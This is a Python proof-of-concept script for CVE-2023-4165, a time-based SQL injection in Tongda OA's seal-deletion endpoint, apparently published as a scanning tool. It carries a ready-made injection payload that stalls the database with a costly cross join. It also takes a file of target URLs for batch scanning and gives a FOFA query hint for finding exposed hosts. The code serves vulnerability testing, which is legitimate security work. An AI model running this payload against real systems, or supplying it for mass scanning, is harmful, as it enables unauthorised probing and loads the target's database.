import requests
import argparse
#fofa: 通达 OA
# 通达 OA_CVE-2023-4165sql 注入漏洞
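def Banner():
    """Print the tool banner: ASCII art, tag line, version/author and usage notice."""
    # Raw string: the art contains backslashes (one of them at the very end of
    # a row) that must be printed literally. In a normal string they are
    # invalid escape sequences (a SyntaxWarning on recent Python versions),
    # and the trailing one acts as a line continuation that merges two rows.
    banner = r"""
_____ __ __ ______ ___ ___ ___ ____ _ _ __ __ _____
/ ____| \ \ / / | ____| |__ \ / _ \ |__ \ |___ \ | || | /_ | / / | ____|
| | \ \ / / | |__ ______ ) | | | | | ) | __) | ______ | || |_ | | / /_ | |__
| | \ \/ / | __| |______| / / | | | | / / |__ < |______| |__ _| | | | '_ \ |___ \
| |____ \ / | |____ / /_ | |_| | / /_ ___) | | | | | | (_) | ___) |
\_____| \/ |______| |____| \___/ |____| |____/ |_| |_| \___/ |____/
tag: 通达 OA_CVE-2023-4165sql 注入漏洞 POC
@version: 1.0.0 @author by ghhycsec
仅限学习使用,请勿用于非法测试!
"""
    print(banner)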
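def poc(url):
    """Run a time-based check for CVE-2023-4165 against one Tongda OA host.

    Sends a single GET request to ``delete_seal.php`` with a conditional,
    deliberately expensive query in ``DELETE_STR`` and reports the host as
    affected when the response takes longer than 13 seconds.

    Reading the result:
      * "[+]" is indicative, not conclusive: a slow network or a loaded
        server can also push the response past the threshold. Confirm
        against the installed version / patch level.
      * "[-]" does not prove the host is patched: the expensive branch only
        runs when the first character of the current database name equals
        char(84) ('T'), so other database names never trigger the delay.
      * Each probe puts measurable load on the target database (cross join
        over information_schema.columns).

    Args:
        url: Base URL or bare host. ``http://`` is prepended when the value
            does not start with an http(s) scheme.

    Returns:
        None. The verdict, or the request error, is printed to stdout.
    """
    payload = "/general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=("
    # Test the prefix, not a substring: a bare host whose name merely
    # contains "http" still needs a scheme.
    if not url.lower().startswith(("http://", "https://")):
        url = "http://" + url
    # Avoid a doubled slash when the target was given with a trailing "/".
    fullpath = url.rstrip("/") + payload
    header = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101Firefox/116.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zhHK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1"
    }
    try:
        # Explicit (connect, read) timeout so one unresponsive host cannot
        # hang a batch run. The read timeout stays well above the 13 s
        # threshold; a timeout is printed like any other request error and
        # is inconclusive.
        response = requests.get(fullpath, headers=header, timeout=(10, 60))
    except requests.RequestException as e:
        print(e)
        return
    # response.elapsed is a datetime.timedelta; comparing it with an int
    # raises TypeError, so compare seconds.
    if response.elapsed.total_seconds() > 13:
        print("[+]%s 存在失 CVE-2023-4165 sql 注入" % (url))
    else:
        print("[-]%s 不存在失 CVE-2023-4165 sql 注入" % (url))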
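def main():
    """Parse the command line and run the CVE-2023-4165 check on each target.

    ``-u/--target`` supplies a single URL; ``-f/--file`` supplies a text file
    with one URL per line. ``-u`` wins when both are given. With neither
    option a usage hint is printed and the function returns without probing.
    """
    Banner()
    # The description names the CVE that poc() actually checks.
    parser = argparse.ArgumentParser(description="CVE-2023-4165 检测工具 通达 OA sql 注入")
    parser.add_argument("-u", "--target", help="单个目标URL")
    parser.add_argument("-f", "--file", help="包含多个目标URL的文件")
    args = parser.parse_args()
    if args.target:
        target_urls = [args.target]
    elif args.file:
        with open(args.file, "r") as f:
            # Skip blank lines and surrounding whitespace so they are not
            # probed as hosts.
            target_urls = [line.strip() for line in f if line.strip()]
    else:
        print("请使用 -u 或 -f 指定目标")
        return
    for url in target_urls:
        poc(url)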
# Script entry point: run the command-line interface only when the file is
# executed directly, not when it is imported as a module.
if __name__ == "__main__":
    main()